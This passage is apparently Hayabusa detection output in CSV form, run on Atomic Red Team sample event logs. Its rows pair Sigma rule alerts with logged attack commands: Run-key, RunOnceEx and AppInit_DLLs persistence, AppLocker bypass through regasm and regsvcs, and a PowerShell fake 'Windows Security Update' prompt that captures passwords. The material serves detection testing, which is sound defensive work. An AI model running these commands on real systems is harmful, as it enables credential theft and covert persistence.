Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 